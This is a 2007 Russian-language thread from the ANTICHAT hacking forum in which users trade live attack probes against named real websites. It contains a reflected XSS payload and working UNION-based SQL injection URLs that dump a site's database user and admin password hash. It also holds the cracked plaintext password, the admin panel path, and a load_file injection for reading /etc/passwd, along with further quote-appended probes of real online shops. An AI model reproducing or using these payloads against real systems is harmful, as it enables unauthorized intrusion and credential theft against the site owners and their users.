ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

04.11.2007, 19:38
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме: 668286
Репутация:
187
|
|
Сообщение от edos
_http://www.plpm.ru/catalogue.php?type=361'
что можно сделать, что-то не допру ?
ыыы веселье))
http://www.plpm.ru/catalogue.php?type=361%3Cscript%3Ealert('hi')%3C/script%3E
|
|
|

06.11.2007, 00:48
|
|
Новичок
Регистрация: 05.11.2007
Сообщений: 1
Провел на форуме: 31893
Репутация:
0
|
|
Есть ли тут скл-инъекция?
http://www.selfserviceworld.com/research.php?rc_id='
|
|
|

06.11.2007, 01:25
|
|
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме: 1896022
Репутация:
259
|
|
Сообщение от Sokoloff
Есть ли тут скл-инъекция?
http://www.selfserviceworld.com/research.php?rc_id='
Есть, для начала
Код:
http://www.selfserviceworld.com/research.php?rc_id=-309+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8/*
atmmarketplace@localhost/sitedb/5.0.22
Код:
http://www.selfserviceworld.com/research.php?rc_id=-309+union+select+name,2,password,4,5,6,7,8+from+users/*
admin: dbcc4a47bc32b0e84903c632fb0dc08c
Осталось только расшифровать хеш админа)
Последний раз редактировалось min7; 06.11.2007 в 02:20..
|
|
|

06.11.2007, 02:45
|
|
Новичок
Регистрация: 05.11.2007
Сообщений: 1
Провел на форуме: 31893
Репутация:
0
|
|
min7,
я хэш мускла нашёл )
atmmarketplace:54a43983056d0aa5
admin:dbcc4a47bc32b0e84903c632fb0dc08c
а каким образом можно узнать ссылку на админку? ) robots.txt отстуствует.
Если есть возможность, оставь аську плиз, есть пара вопросов )
Сорри за оффтоп
Последний раз редактировалось Sokoloff; 06.11.2007 в 02:50..
|
|
|

06.11.2007, 09:47
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме: 1292655
Репутация:
168
|
|
Сообщение от Sokoloff
min7,
я хэш мускла нашёл )
atmmarketplace:54a43983056d0aa5
а каким образом можно узнать ссылку на админку? ) robots.txt отстуствует.
Если есть возможность, оставь аську плиз, есть пара вопросов )
Сорри за оффтоп
по поводу поиска директорий лучше всего пользоваться сканерами /я работаю с пакетом nikto/, хотя 90% можно найти и руками вариантов не так много.
теперь по поводу сайта выше - админка сдесь http://www.selfserviceworld.com/admin но пароль из хеша не подходит/ dbcc4a47bc32b0e84903c632fb0dc08c:lackawanna/
советую пойти таким путём, там есть возвожность читать произвольные вайлы http://www.selfserviceworld.com/research.php?rc_id=-309+union+select+load_file(0x2f6574632f706173737764),2,password,4,5,6,7,8+from+users/* где load_file(_полный_путь_к_файлу_)
попробуй подобрать путь к сайту, потом просмотри файл .htaccess, ещё путь к вайлу пароля может буть в конфиге апача httpd.conf, ну и последний вириант, скринт_auth_.php в папке admin
/давно я столько не писал)))/
удачи
Последний раз редактировалось big_BRAT; 06.11.2007 в 09:50..
|
|
|

06.11.2007, 23:05
|
|
Новичок
Регистрация: 05.11.2007
Сообщений: 1
Провел на форуме: 31893
Репутация:
0
|
|
load_file(0x2f6574632f706173737764)
Спасибо за мини-фак, по конкретному сайту 
Последний раз редактировалось Sokoloff; 12.11.2007 в 05:16..
|
|
|

16.11.2007, 19:46
|
|
Новичок
Регистрация: 08.11.2007
Сообщений: 3
Провел на форуме: 75194
Репутация:
6
|
|
если тут уязвимость?
http://tv.km.ru/index.asp?rubric=14`
|
|
|

17.11.2007, 07:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме: 7452489
Репутация:
1359
|
|
Сообщение от eine
если тут уязвимость?
http://tv.km.ru/index.asp?rubric=14`
Скуль -инъекции тут нет жестко значение кастится, и инжектировать в него низзя.. имхо.
|
|
|

17.11.2007, 19:29
|
|
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
Провел на форуме: 1058786
Репутация:
45
|
|
http://shop.kalyany.ru/index.php?categoryID=38'
- тут вроде один столбец
http://shop.fans.com.ua/index.php?productID=8'
|
|
|

20.11.2007, 08:20
|
|
Новичок
Регистрация: 11.01.2007
Сообщений: 2
Провел на форуме: 311386
Репутация:
3
|
|
Имеет ли здесь место sql-инъекция?
http://www.332-332.ru/afisha/?c_id=1'
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|